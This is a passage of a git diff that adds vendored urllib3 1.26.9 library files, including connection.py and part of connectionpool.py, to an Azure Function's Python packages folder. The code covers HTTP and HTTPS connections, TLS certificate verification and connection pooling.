list(self.iteritems()) + + @classmethod + def from_httplib(cls, message): # Python 2 + """Read headers from a Python 2 httplib message object.""" + # python2.7 does not expose a proper API for exporting multiheaders + # efficiently. This function re-reads raw lines from the message + # object and extracts the multiheaders properly. + obs_fold_continued_leaders = (" ", "\t") + headers = [] + + for line in message.headers: + if line.startswith(obs_fold_continued_leaders): + if not headers: + # We received a header line that starts with OWS as described + # in RFC-7230 S3.2.4. This indicates a multiline header, but + # there exists no previous header to which we can attach it. + raise InvalidHeader( + "Header continuation with no previous header: %s" % line + ) + else: + key, value = headers[-1] + headers[-1] = (key, value + " " + line.strip()) + continue + + key, value = line.split(":", 1) + headers.append((key, value.strip())) + + return cls(headers) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_version.py new file mode 100644 index 0000000..d75d8d6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_version.py @@ -0,0 +1,2 @@ +# This file is protected via CODEOWNERS +__version__ = "1.26.9" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connection.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connection.py new file mode 100644 index 0000000..ebd84ec --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connection.py @@ -0,0 +1,567 @@ +from __future__ import absolute_import + +import datetime +import logging +import os +import re +import socket +import warnings +from socket import error as SocketError +from socket import timeout as SocketTimeout + +from .packages import six +from .packages.six.moves.http_client import HTTPConnection as _HTTPConnection +from .packages.six.moves.http_client import HTTPException # noqa: F401 +from .util.proxy import create_proxy_ssl_context + +try: # Compiled with SSL? 
+ import ssl + + BaseSSLError = ssl.SSLError +except (ImportError, AttributeError): # Platform-specific: No SSL. + ssl = None + + class BaseSSLError(BaseException): + pass + + +try: + # Python 3: not a no-op, we're adding this to the namespace so it can be imported. + ConnectionError = ConnectionError +except NameError: + # Python 2 + class ConnectionError(Exception): + pass + + +try: # Python 3: + # Not a no-op, we're adding this to the namespace so it can be imported. + BrokenPipeError = BrokenPipeError +except NameError: # Python 2: + + class BrokenPipeError(Exception): + pass + + +from ._collections import HTTPHeaderDict # noqa (historical, removed in v2) +from ._version import __version__ +from .exceptions import ( + ConnectTimeoutError, + NewConnectionError, + SubjectAltNameWarning, + SystemTimeWarning, +) +from .util import SKIP_HEADER, SKIPPABLE_HEADERS, connection +from .util.ssl_ import ( + assert_fingerprint, + create_urllib3_context, + is_ipaddress, + resolve_cert_reqs, + resolve_ssl_version, + ssl_wrap_socket, +) +from .util.ssl_match_hostname import CertificateError, match_hostname + +log = logging.getLogger(__name__) + +port_by_scheme = {"http": 80, "https": 443} + +# When it comes time to update this value as a part of regular maintenance +# (ie test_recent_date is failing) update it to ~6 months before the current date. +RECENT_DATE = datetime.date(2020, 7, 1) + +_CONTAINS_CONTROL_CHAR_RE = re.compile(r"[^-!#$%&'*+.^_`|~0-9a-zA-Z]") + + +class HTTPConnection(_HTTPConnection, object): + """ + Based on :class:`http.client.HTTPConnection` but provides an extra constructor + backwards-compatibility layer between older and newer Pythons. + + Additional keyword parameters are used to configure attributes of the connection. + Accepted parameters include: + + - ``strict``: See the documentation on :class:`urllib3.connectionpool.HTTPConnectionPool` + - ``source_address``: Set the source address for the current connection. + - ``socket_options``: Set specific options on the underlying socket. If not specified, then + defaults are loaded from ``HTTPConnection.default_socket_options`` which includes disabling + Nagle's algorithm (sets TCP_NODELAY to 1) unless the connection is behind a proxy. + + For example, if you wish to enable TCP Keep Alive in addition to the defaults, + you might pass: + + .. code-block:: python + + HTTPConnection.default_socket_options + [ + (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1), + ] + + Or you may want to disable the defaults by passing an empty list (e.g., ``[]``). + """ + + default_port = port_by_scheme["http"] + + #: Disable Nagle's algorithm by default. + #: ``[(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]`` + default_socket_options = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)] + + #: Whether this connection verifies the host's certificate. + is_verified = False + + #: Whether this proxy connection (if used) verifies the proxy host's + #: certificate. + proxy_is_verified = None + + def __init__(self, *args, **kw): + if not six.PY2: + kw.pop("strict", None) + + # Pre-set source_address. + self.source_address = kw.get("source_address") + + #: The socket options provided by the user. If no options are + #: provided, we use the default options. + self.socket_options = kw.pop("socket_options", self.default_socket_options) + + # Proxy options provided by the user. 
+ self.proxy = kw.pop("proxy", None) + self.proxy_config = kw.pop("proxy_config", None) + + _HTTPConnection.__init__(self, *args, **kw) + + @property + def host(self): + """ + Getter method to remove any trailing dots that indicate the hostname is an FQDN. + + In general, SSL certificates don't include the trailing dot indicating a + fully-qualified domain name, and thus, they don't validate properly when + checked against a domain name that includes the dot. In addition, some + servers may not expect to receive the trailing dot when provided. + + However, the hostname with trailing dot is critical to DNS resolution; doing a + lookup with the trailing dot will properly only resolve the appropriate FQDN, + whereas a lookup without a trailing dot will search the system's search domain + list. Thus, it's important to keep the original host around for use only in + those cases where it's appropriate (i.e., when doing DNS lookup to establish the + actual TCP connection across which we're going to send HTTP requests). + """ + return self._dns_host.rstrip(".") + + @host.setter + def host(self, value): + """ + Setter for the `host` property. + + We assume that only urllib3 uses the _dns_host attribute; httplib itself + only uses `host`, and it seems reasonable that other libraries follow suit. + """ + self._dns_host = value + + def _new_conn(self): + """Establish a socket connection and set nodelay settings on it. + + :return: New socket connection. + """ + extra_kw = {} + if self.source_address: + extra_kw["source_address"] = self.source_address + + if self.socket_options: + extra_kw["socket_options"] = self.socket_options + + try: + conn = connection.create_connection( + (self._dns_host, self.port), self.timeout, **extra_kw + ) + + except SocketTimeout: + raise ConnectTimeoutError( + self, + "Connection to %s timed out. (connect timeout=%s)" + % (self.host, self.timeout), + ) + + except SocketError as e: + raise NewConnectionError( + self, "Failed to establish a new connection: %s" % e + ) + + return conn + + def _is_using_tunnel(self): + # Google App Engine's httplib does not define _tunnel_host + return getattr(self, "_tunnel_host", None) + + def _prepare_conn(self, conn): + self.sock = conn + if self._is_using_tunnel(): + # TODO: Fix tunnel so it doesn't depend on self.sock state. + self._tunnel() + # Mark this connection as not reusable + self.auto_open = 0 + + def connect(self): + conn = self._new_conn() + self._prepare_conn(conn) + + def putrequest(self, method, url, *args, **kwargs): + """ """ + # Empty docstring because the indentation of CPython's implementation + # is broken but we don't want this method in our documentation. 
+ match = _CONTAINS_CONTROL_CHAR_RE.search(method) + if match: + raise ValueError( + "Method cannot contain non-token characters %r (found at least %r)" + % (method, match.group()) + ) + + return _HTTPConnection.putrequest(self, method, url, *args, **kwargs) + + def putheader(self, header, *values): + """ """ + if not any(isinstance(v, str) and v == SKIP_HEADER for v in values): + _HTTPConnection.putheader(self, header, *values) + elif six.ensure_str(header.lower()) not in SKIPPABLE_HEADERS: + raise ValueError( + "urllib3.util.SKIP_HEADER only supports '%s'" + % ("', '".join(map(str.title, sorted(SKIPPABLE_HEADERS))),) + ) + + def request(self, method, url, body=None, headers=None): + if headers is None: + headers = {} + else: + # Avoid modifying the headers passed into .request() + headers = headers.copy() + if "user-agent" not in (six.ensure_str(k.lower()) for k in headers): + headers["User-Agent"] = _get_default_user_agent() + super(HTTPConnection, self).request(method, url, body=body, headers=headers) + + def request_chunked(self, method, url, body=None, headers=None): + """ + Alternative to the common request method, which sends the + body with chunked encoding and not as one block + """ + headers = headers or {} + header_keys = set([six.ensure_str(k.lower()) for k in headers]) + skip_accept_encoding = "accept-encoding" in header_keys + skip_host = "host" in header_keys + self.putrequest( + method, url, skip_accept_encoding=skip_accept_encoding, skip_host=skip_host + ) + if "user-agent" not in header_keys: + self.putheader("User-Agent", _get_default_user_agent()) + for header, value in headers.items(): + self.putheader(header, value) + if "transfer-encoding" not in header_keys: + self.putheader("Transfer-Encoding", "chunked") + self.endheaders() + + if body is not None: + stringish_types = six.string_types + (bytes,) + if isinstance(body, stringish_types): + body = (body,) + for chunk in body: + if not chunk: + continue + if not isinstance(chunk, bytes): + chunk = chunk.encode("utf8") + len_str = hex(len(chunk))[2:] + to_send = bytearray(len_str.encode()) + to_send += b"\r\n" + to_send += chunk + to_send += b"\r\n" + self.send(to_send) + + # After the if clause, to always have a closed body + self.send(b"0\r\n\r\n") + + +class HTTPSConnection(HTTPConnection): + """ + Many of the parameters to this constructor are passed to the underlying SSL + socket by means of :py:func:`urllib3.util.ssl_wrap_socket`. + """ + + default_port = port_by_scheme["https"] + + cert_reqs = None + ca_certs = None + ca_cert_dir = None + ca_cert_data = None + ssl_version = None + assert_fingerprint = None + tls_in_tls_required = False + + def __init__( + self, + host, + port=None, + key_file=None, + cert_file=None, + key_password=None, + strict=None, + timeout=socket._GLOBAL_DEFAULT_TIMEOUT, + ssl_context=None, + server_hostname=None, + **kw + ): + + HTTPConnection.__init__(self, host, port, strict=strict, timeout=timeout, **kw) + + self.key_file = key_file + self.cert_file = cert_file + self.key_password = key_password + self.ssl_context = ssl_context + self.server_hostname = server_hostname + + # Required property for Google AppEngine 1.9.0 which otherwise causes + # HTTPS requests to go out as HTTP. 
(See Issue #356) + self._protocol = "https" + + def set_cert( + self, + key_file=None, + cert_file=None, + cert_reqs=None, + key_password=None, + ca_certs=None, + assert_hostname=None, + assert_fingerprint=None, + ca_cert_dir=None, + ca_cert_data=None, + ): + """ + This method should only be called once, before the connection is used. + """ + # If cert_reqs is not provided we'll assume CERT_REQUIRED unless we also + # have an SSLContext object in which case we'll use its verify_mode. + if cert_reqs is None: + if self.ssl_context is not None: + cert_reqs = self.ssl_context.verify_mode + else: + cert_reqs = resolve_cert_reqs(None) + + self.key_file = key_file + self.cert_file = cert_file + self.cert_reqs = cert_reqs + self.key_password = key_password + self.assert_hostname = assert_hostname + self.assert_fingerprint = assert_fingerprint + self.ca_certs = ca_certs and os.path.expanduser(ca_certs) + self.ca_cert_dir = ca_cert_dir and os.path.expanduser(ca_cert_dir) + self.ca_cert_data = ca_cert_data + + def connect(self): + # Add certificate verification + self.sock = conn = self._new_conn() + hostname = self.host + tls_in_tls = False + + if self._is_using_tunnel(): + if self.tls_in_tls_required: + self.sock = conn = self._connect_tls_proxy(hostname, conn) + tls_in_tls = True + + # Calls self._set_hostport(), so self.host is + # self._tunnel_host below. + self._tunnel() + # Mark this connection as not reusable + self.auto_open = 0 + + # Override the host with the one we're requesting data from. + hostname = self._tunnel_host + + server_hostname = hostname + if self.server_hostname is not None: + server_hostname = self.server_hostname + + is_time_off = datetime.date.today() < RECENT_DATE + if is_time_off: + warnings.warn( + ( + "System time is way off (before {0}). This will probably " + "lead to SSL verification errors" + ).format(RECENT_DATE), + SystemTimeWarning, + ) + + # Wrap socket using verification with the root certs in + # trusted_root_certs + default_ssl_context = False + if self.ssl_context is None: + default_ssl_context = True + self.ssl_context = create_urllib3_context( + ssl_version=resolve_ssl_version(self.ssl_version), + cert_reqs=resolve_cert_reqs(self.cert_reqs), + ) + + context = self.ssl_context + context.verify_mode = resolve_cert_reqs(self.cert_reqs) + + # Try to load OS default certs if none are given. + # Works well on Windows (requires Python3.4+) + if ( + not self.ca_certs + and not self.ca_cert_dir + and not self.ca_cert_data + and default_ssl_context + and hasattr(context, "load_default_certs") + ): + context.load_default_certs() + + self.sock = ssl_wrap_socket( + sock=conn, + keyfile=self.key_file, + certfile=self.cert_file, + key_password=self.key_password, + ca_certs=self.ca_certs, + ca_cert_dir=self.ca_cert_dir, + ca_cert_data=self.ca_cert_data, + server_hostname=server_hostname, + ssl_context=context, + tls_in_tls=tls_in_tls, + ) + + # If we're using all defaults and the connection + # is TLSv1 or TLSv1.1 we throw a DeprecationWarning + # for the host. + if ( + default_ssl_context + and self.ssl_version is None + and hasattr(self.sock, "version") + and self.sock.version() in {"TLSv1", "TLSv1.1"} + ): + warnings.warn( + "Negotiating TLSv1/TLSv1.1 by default is deprecated " + "and will be disabled in urllib3 v2.0.0. 
Connecting to " + "'%s' with '%s' can be enabled by explicitly opting-in " + "with 'ssl_version'" % (self.host, self.sock.version()), + DeprecationWarning, + ) + + if self.assert_fingerprint: + assert_fingerprint( + self.sock.getpeercert(binary_form=True), self.assert_fingerprint + ) + elif ( + context.verify_mode != ssl.CERT_NONE + and not getattr(context, "check_hostname", False) + and self.assert_hostname is not False + ): + # While urllib3 attempts to always turn off hostname matching from + # the TLS library, this cannot always be done. So we check whether + # the TLS Library still thinks it's matching hostnames. + cert = self.sock.getpeercert() + if not cert.get("subjectAltName", ()): + warnings.warn( + ( + "Certificate for {0} has no `subjectAltName`, falling back to check for a " + "`commonName` for now. This feature is being removed by major browsers and " + "deprecated by RFC 2818. (See https://github.com/urllib3/urllib3/issues/497 " + "for details.)".format(hostname) + ), + SubjectAltNameWarning, + ) + _match_hostname(cert, self.assert_hostname or server_hostname) + + self.is_verified = ( + context.verify_mode == ssl.CERT_REQUIRED + or self.assert_fingerprint is not None + ) + + def _connect_tls_proxy(self, hostname, conn): + """ + Establish a TLS connection to the proxy using the provided SSL context. + """ + proxy_config = self.proxy_config + ssl_context = proxy_config.ssl_context + if ssl_context: + # If the user provided a proxy context, we assume CA and client + # certificates have already been set + return ssl_wrap_socket( + sock=conn, + server_hostname=hostname, + ssl_context=ssl_context, + ) + + ssl_context = create_proxy_ssl_context( + self.ssl_version, + self.cert_reqs, + self.ca_certs, + self.ca_cert_dir, + self.ca_cert_data, + ) + + # If no cert was provided, use only the default options for server + # certificate validation + socket = ssl_wrap_socket( + sock=conn, + ca_certs=self.ca_certs, + ca_cert_dir=self.ca_cert_dir, + ca_cert_data=self.ca_cert_data, + server_hostname=hostname, + ssl_context=ssl_context, + ) + + if ssl_context.verify_mode != ssl.CERT_NONE and not getattr( + ssl_context, "check_hostname", False + ): + # While urllib3 attempts to always turn off hostname matching from + # the TLS library, this cannot always be done. So we check whether + # the TLS Library still thinks it's matching hostnames. + cert = socket.getpeercert() + if not cert.get("subjectAltName", ()): + warnings.warn( + ( + "Certificate for {0} has no `subjectAltName`, falling back to check for a " + "`commonName` for now. This feature is being removed by major browsers and " + "deprecated by RFC 2818. (See https://github.com/urllib3/urllib3/issues/497 " + "for details.)".format(hostname) + ), + SubjectAltNameWarning, + ) + _match_hostname(cert, hostname) + + self.proxy_is_verified = ssl_context.verify_mode == ssl.CERT_REQUIRED + return socket + + +def _match_hostname(cert, asserted_hostname): + # Our upstream implementation of ssl.match_hostname() + # only applies this normalization to IP addresses so it doesn't + # match DNS SANs so we do the same thing! + stripped_hostname = asserted_hostname.strip("u[]") + if is_ipaddress(stripped_hostname): + asserted_hostname = stripped_hostname + + try: + match_hostname(cert, asserted_hostname) + except CertificateError as e: + log.warning( + "Certificate did not match expected hostname: %s. 
Certificate: %s", + asserted_hostname, + cert, + ) + # Add cert to exception and reraise so client code can inspect + # the cert when catching the exception, if they want to + e._peer_cert = cert + raise + + +def _get_default_user_agent(): + return "python-urllib3/%s" % __version__ + + +class DummyConnection(object): + """Used to detect a failed ConnectionCls import.""" + + pass + + +if not ssl: + HTTPSConnection = DummyConnection # noqa: F811 + + +VerifiedHTTPSConnection = HTTPSConnection diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connectionpool.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connectionpool.py new file mode 100644 index 0000000..b6c99e9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connectionpool.py @@ -0,0 +1,1108 @@ +from __future__ import absolute_import + +import errno +import logging +import re +import socket +import sys +import warnings +from socket import error as SocketError +from socket import timeout as SocketTimeout + +from .connection import ( + BaseSSLError, + BrokenPipeError, + DummyConnection, + HTTPConnection, + HTTPException, + HTTPSConnection, + VerifiedHTTPSConnection, + port_by_scheme, +) +from .exceptions import ( + ClosedPoolError, + EmptyPoolError, + HeaderParsingError, + HostChangedError, + InsecureRequestWarning, + LocationValueError, + MaxRetryError, + NewConnectionError, + ProtocolError, + ProxyError, + ReadTimeoutError, + SSLError, + TimeoutError, +) +from .packages import six +from .packages.six.moves import queue +from .request import RequestMethods +from .response import HTTPResponse +from .util.connection import is_connection_dropped +from .util.proxy import connection_requires_http_tunnel +from .util.queue import LifoQueue +from .util.request import set_file_position +from .util.response import assert_header_parsing +from .util.retry import Retry +from .util.ssl_match_hostname import CertificateError +from .util.timeout import Timeout +from .util.url import Url, _encode_target +from .util.url import _normalize_host as normalize_host +from .util.url import get_host, parse_url + +xrange = six.moves.xrange + +log = logging.getLogger(__name__) + +_Default = object() + + +# Pool objects +class ConnectionPool(object): + """ + Base class for all connection pools, such as + :class:`.HTTPConnectionPool` and :class:`.HTTPSConnectionPool`. + + .. note:: + ConnectionPool.urlopen() does not normalize or percent-encode target URIs + which is useful if your target server doesn't support percent-encoded + target URIs. + """ + + scheme = None + QueueCls = LifoQueue + + def __init__(self, host, port=None): + if not host: + raise LocationValueError("No host specified.") + + self.host = _normalize_host(host, scheme=self.scheme) + self._proxy_host = host.lower() + self.port = port + + def __str__(self): + return "%s(host=%r, port=%r)" % (type(self).__name__, self.host, self.port) + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + self.close() + # Return False to re-raise any potential exceptions + return False + + def close(self): + """ + Close all pooled connections and disable the pool. 
+ """ + pass + + +# This is taken from http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252 +_blocking_errnos = {errno.EAGAIN, errno.EWOULDBLOCK} + + +class HTTPConnectionPool(ConnectionPool, RequestMethods): + """ + Thread-safe connection pool for one host. + + :param host: + Host used for this HTTP Connection (e.g. "localhost"), passed into + :class:`http.client.HTTPConnection`. + + :param port: + Port used for this HTTP Connection (None is equivalent to 80), passed + into :class:`http.client.HTTPConnection`. + + :param strict: + Causes BadStatusLine to be raised if the status line can't be parsed + as a valid HTTP/1.0 or 1.1 status line, passed into + :class:`http.client.HTTPConnection`. + + .. note:: + Only works in Python 2. This parameter is ignored in Python 3. + + :param timeout: + Socket timeout in seconds for each individual connection. This can + be a float or integer, which sets the timeout for the HTTP request, + or an instance of :class:`urllib3.util.Timeout` which gives you more + fine-grained control over request timeouts. After the constructor has + been parsed, this is always a `urllib3.util.Timeout` object. + + :param maxsize: + Number of connections to save that can be reused. More than 1 is useful + in multithreaded situations. If ``block`` is set to False, more + connections will be created but they will not be saved once they've + been used. + + :param block: + If set to True, no more than ``maxsize`` connections will be used at + a time. When no free connections are available, the call will block + until a connection has been released. This is a useful side effect for + particular multithreaded situations where one does not want to use more + than maxsize connections per host to prevent flooding. + + :param headers: + Headers to include with all requests, unless other headers are given + explicitly. + + :param retries: + Retry configuration to use by default with requests in this pool. + + :param _proxy: + Parsed proxy URL, should not be used directly, instead, see + :class:`urllib3.ProxyManager` + + :param _proxy_headers: + A dictionary with proxy headers, should not be used directly, + instead, see :class:`urllib3.ProxyManager` + + :param \\**conn_kw: + Additional parameters are used to create fresh :class:`urllib3.connection.HTTPConnection`, + :class:`urllib3.connection.HTTPSConnection` instances. + """ + + scheme = "http" + ConnectionCls = HTTPConnection + ResponseCls = HTTPResponse + + def __init__( + self, + host, + port=None, + strict=False, + timeout=Timeout.DEFAULT_TIMEOUT, + maxsize=1, + block=False, + headers=None, + retries=None, + _proxy=None, + _proxy_headers=None, + _proxy_config=None, + **conn_kw + ): + ConnectionPool.__init__(self, host, port) + RequestMethods.__init__(self, headers) + + self.strict = strict + + if not isinstance(timeout, Timeout): + timeout = Timeout.from_float(timeout) + + if retries is None: + retries = Retry.DEFAULT + + self.timeout = timeout + self.retries = retries + + self.pool = self.QueueCls(maxsize) + self.block = block + + self.proxy = _proxy + self.proxy_headers = _proxy_headers or {} + self.proxy_config = _proxy_config + + # Fill the queue up so that doing get() on it will block properly + for _ in xrange(maxsize): + self.pool.put(None) + + # These are mostly for testing and debugging purposes. + self.num_connections = 0 + self.num_requests = 0 + self.conn_kw = conn_kw + + if self.proxy: + # Enable Nagle's algorithm for proxies, to avoid packet fragmentation. 
+ # We cannot know if the user has added default socket options, so we cannot replace the + # list. + self.conn_kw.setdefault("socket_options", []) + + self.conn_kw["proxy"] = self.proxy + self.conn_kw["proxy_config"] = self.proxy_config + + def _new_conn(self): + """ + Return a fresh :class:`HTTPConnection`. + """ + self.num_connections += 1 + log.debug( + "Starting new HTTP connection (%d): %s:%s", + self.num_connections, + self.host, + self.port or "80", + ) + + conn = self.ConnectionCls( + host=self.host, + port=self.port, + timeout=self.timeout.connect_timeout, + strict=self.strict, + **self.conn_kw + ) + return conn + + def _get_conn(self, timeout=None): + """ + Get a connection. Will return a pooled connection if one is available. + + If no connections are available and :prop:`.block` is ``False``, then a + fresh connection is returned. + + :param timeout: + Seconds to wait before giving up and raising + :class:`urllib3.exceptions.EmptyPoolError` if the pool is empty and + :prop:`.block` is ``True``. + """ + conn = None + try: + conn = self.pool.get(block=self.block, timeout=timeout) + + except AttributeError: # self.pool is None + raise ClosedPoolError(self, "Pool is closed.") + + except queue.Empty: + if self.block: + raise EmptyPoolError( + self, + "Pool reached maximum size and no more connections are allowed.", + ) + pass # Oh well, we'll create a new connection then + + # If this is a persistent connection, check if it got disconnected + if conn and is_connection_dropped(conn): + log.debug("Resetting dropped connection: %s", self.host) + conn.close() + if getattr(conn, "auto_open", 1) == 0: + # This is a proxied connection that has been mutated by + # http.client._tunnel() and cannot be reused (since it would + # attempt to bypass the proxy) + conn = None + + return conn or self._new_conn() + + def _put_conn(self, conn): + """ + Put a connection back into the pool. + + :param conn: + Connection object for the current host and port as returned by + :meth:`._new_conn` or :meth:`._get_conn`. + + If the pool is already full, the connection is closed and discarded + because we exceeded maxsize. If connections are discarded frequently, + then maxsize should be increased. + + If the pool is closed, then the connection will be closed and discarded. + """ + try: + self.pool.put(conn, block=False) + return # Everything is dandy, done. + except AttributeError: + # self.pool is None. + pass + except queue.Full: + # This should never happen if self.block == True + log.warning( + "Connection pool is full, discarding connection: %s. Connection pool size: %s", + self.host, + self.pool.qsize(), + ) + # Connection never got put back into the pool, close it. + if conn: + conn.close() + + def _validate_conn(self, conn): + """ + Called right before a request is made, after the socket is created. + """ + pass + + def _prepare_proxy(self, conn): + # Nothing to do for HTTP connections. + pass + + def _get_timeout(self, timeout): + """Helper that always returns a :class:`urllib3.util.Timeout`""" + if timeout is _Default: + return self.timeout.clone() + + if isinstance(timeout, Timeout): + return timeout.clone() + else: + # User passed us an int/float. This is for backwards compatibility, + # can be removed later + return Timeout.from_float(timeout) + + def _raise_timeout(self, err, url, timeout_value): + """Is the error actually a timeout? Will raise a ReadTimeout or pass""" + + if isinstance(err, SocketTimeout): + raise ReadTimeoutError( + self, url, "Read timed out. 
(read timeout=%s)" % timeout_value + ) + + # See the above comment about EAGAIN in Python 3. In Python 2 we have + # to specifically catch it and throw the timeout error + if hasattr(err, "errno") and err.errno in _blocking_errnos: + raise ReadTimeoutError( + self, url, "Read timed out. (read timeout=%s)" % timeout_value + ) + + # Catch possible read timeouts thrown as SSL errors. If not the + # case, rethrow the original. We need to do this because of: + # http://bugs.python.org/issue10272 + if "timed out" in str(err) or "did not complete (read)" in str( + err + ): # Python < 2.7.4 + raise ReadTimeoutError( + self, url, "Read timed out. (read timeout=%s)" % timeout_value + ) + + def _make_request( + self, conn, method, url, timeout=_Default, chunked=False, **httplib_request_kw + ): + """ + Perform a request on a given urllib connection object taken from our + pool. + + :param conn: + a connection from one of our connection pools + + :param timeout: + Socket timeout in seconds for the request. This can be a + float or integer, which will set the same timeout value for + the socket connect and the socket read, or an instance of + :class:`urllib3.util.Timeout`, which gives you more fine-grained + control over your timeouts. + """ + self.num_requests += 1 + + timeout_obj = self._get_timeout(timeout) + timeout_obj.start_connect() + conn.timeout = timeout_obj.connect_timeout + + # Trigger any extra validation we need to do. + try: + self._validate_conn(conn) + except (SocketTimeout, BaseSSLError) as e: + # Py2 raises this as a BaseSSLError, Py3 raises it as socket timeout. + self._raise_timeout(err=e, url=url, timeout_value=conn.timeout) + raise + + # conn.request() calls http.client.*.request, not the method in + # urllib3.request. It also calls makefile (recv) on the socket. + try: + if chunked: + conn.request_chunked(method, url, **httplib_request_kw) + else: + conn.request(method, url, **httplib_request_kw) + + # We are swallowing BrokenPipeError (errno.EPIPE) since the server is + # legitimately able to close the connection after sending a valid response. + # With this behaviour, the received response is still readable. + except BrokenPipeError: + # Python 3 + pass + except IOError as e: + # Python 2 and macOS/Linux + # EPIPE and ESHUTDOWN are BrokenPipeError on Python 2, and EPROTOTYPE is needed on macOS + # https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/ + if e.errno not in { + errno.EPIPE, + errno.ESHUTDOWN, + errno.EPROTOTYPE, + }: + raise + + # Reset the timeout for the recv() on the socket + read_timeout = timeout_obj.read_timeout + + # App Engine doesn't have a sock attr + if getattr(conn, "sock", None): + # In Python 3 socket.py will catch EAGAIN and return None when you + # try and read into the file pointer created by http.client, which + # instead raises a BadStatusLine exception. Instead of catching + # the exception and assuming all BadStatusLine exceptions are read + # timeouts, check for a zero timeout before making the request. + if read_timeout == 0: + raise ReadTimeoutError( + self, url, "Read timed out. 
(read timeout=%s)" % read_timeout + ) + if read_timeout is Timeout.DEFAULT_TIMEOUT: + conn.sock.settimeout(socket.getdefaulttimeout()) + else: # None or a value + conn.sock.settimeout(read_timeout) + + # Receive the response from the server + try: + try: + # Python 2.7, use buffering of HTTP responses + httplib_response = conn.getresponse(buffering=True) + except TypeError: + # Python 3 + try: + httplib_response = conn.getresponse() + except BaseException as e: + # Remove the TypeError from the exception chain in + # Python 3 (including for exceptions like SystemExit). + # Otherwise it looks like a bug in the code. + six.raise_from(e, None) + except (SocketTimeout, BaseSSLError, SocketError) as e: + self._raise_timeout(err=e, url=url, timeout_value=read_timeout) + raise + + # AppEngine doesn't have a version attr. + http_version = getattr(conn, "_http_vsn_str", "HTTP/?") + log.debug( + '%s://%s:%s "%s %s %s" %s %s', + self.scheme, + self.host, + self.port, + method, + url, + http_version, + httplib_response.status, + httplib_response.length, + ) + + try: + assert_header_parsing(httplib_response.msg) + except (HeaderParsingError, TypeError) as hpe: # Platform-specific: Python 3 + log.warning( + "Failed to parse headers (url=%s): %s", + self._absolute_url(url), + hpe, + exc_info=True, + ) + + return httplib_response + + def _absolute_url(self, path): + return Url(scheme=self.scheme, host=self.host, port=self.port, path=path).url + + def close(self): + """ + Close all pooled connections and disable the pool. + """ + if self.pool is None: + return + # Disable access to the pool + old_pool, self.pool = self.pool, None + + try: + while True: + conn = old_pool.get(block=False) + if conn: + conn.close() + + except queue.Empty: + pass # Done. + + def is_same_host(self, url): + """ + Check if the given ``url`` is a member of the same host as this + connection pool. + """ + if url.startswith("/"): + return True + + # TODO: Add optional support for socket.gethostbyname checking. + scheme, host, port = get_host(url) + if host is not None: + host = _normalize_host(host, scheme=scheme) + + # Use explicit default port for comparison when none is given + if self.port and not port: + port = port_by_scheme.get(scheme) + elif not self.port and port == port_by_scheme.get(scheme): + port = None + + return (scheme, host, port) == (self.scheme, self.host, self.port) + + def urlopen( + self, + method, + url, + body=None, + headers=None, + retries=None, + redirect=True, + assert_same_host=True, + timeout=_Default, + pool_timeout=None, + release_conn=None, + chunked=False, + body_pos=None, + **response_kw + ): + """ + Get a connection from the pool and perform an HTTP request. This is the + lowest level call for making a request, so you'll need to specify all + the raw details. + + .. note:: + + More commonly, it's appropriate to use a convenience method provided + by :class:`.RequestMethods`, such as :meth:`request`. + + .. note:: + + `release_conn` will only behave as expected if + `preload_content=False` because we want to make + `preload_content=False` the default behaviour someday soon without + breaking backwards compatibility. + + :param method: + HTTP request method (such as GET, POST, PUT, etc.) + + :param url: + The URL to perform the request on. + + :param body: + Data to send in the request body, either :class:`str`, :class:`bytes`, + an iterable of :class:`str`/:class:`bytes`, or a file-like object. + + :param headers: + Dictionary of custom headers to send, such as User-Agent, + If-None-Match, etc. 
If None, pool headers are used. If provided, + these headers completely replace any pool-specific headers. + + :param retries: + Configure the number of retries to allow before raising a + :class:`~urllib3.exceptions.MaxRetryError` exception. + + Pass ``None`` to retry until you receive a response. Pass a + :class:`~urllib3.util.retry.Retry` object for fine-grained control + over different types of retries. + Pass an integer number to retry connection errors that many times, + but no other types of errors. Pass zero to never retry. + + If ``False``, then retries are disabled and any exception is raised + immediately. Also, instead of raising a MaxRetryError on redirects, + the redirect response will be returned. + + :type retries: :class:`~urllib3.util.retry.Retry`, False, or an int. + + :param redirect: + If True, automatically handle redirects (status codes 301, 302, + 303, 307, 308). Each redirect counts as a retry. Disabling retries + will disable redirect, too. + + :param assert_same_host: + If ``True``, will make sure that the host of the pool requests is + consistent else will raise HostChangedError. When ``False``, you can + use the pool on an HTTP proxy and request foreign hosts. + + :param timeout: + If specified, overrides the default timeout for this one + request. It may be a float (in seconds) or an instance of + :class:`urllib3.util.Timeout`. + + :param pool_timeout: + If set and the pool is set to block=True, then this method will + block for ``pool_timeout`` seconds and raise EmptyPoolError if no + connection is available within the time period. + + :param release_conn: + If False, then the urlopen call will not release the connection + back into the pool once a response is received (but will release if + you read the entire contents of the response such as when + `preload_content=True`). This is useful if you're not preloading + the response's content immediately. You will need to call + ``r.release_conn()`` on the response ``r`` to return the connection + back into the pool. If None, it takes the value of + ``response_kw.get('preload_content', True)``. + + :param chunked: + If True, urllib3 will send the body using chunked transfer + encoding. Otherwise, urllib3 will send the body using the standard + content-length form. Defaults to False. + + :param int body_pos: + Position to seek to in file-like body in the event of a retry or + redirect. Typically this won't need to be set because urllib3 will + auto-populate the value when needed. + + :param \\**response_kw: + Additional parameters are passed to + :meth:`urllib3.response.HTTPResponse.from_httplib` + """ + + parsed_url = parse_url(url) + destination_scheme = parsed_url.scheme + + if headers is 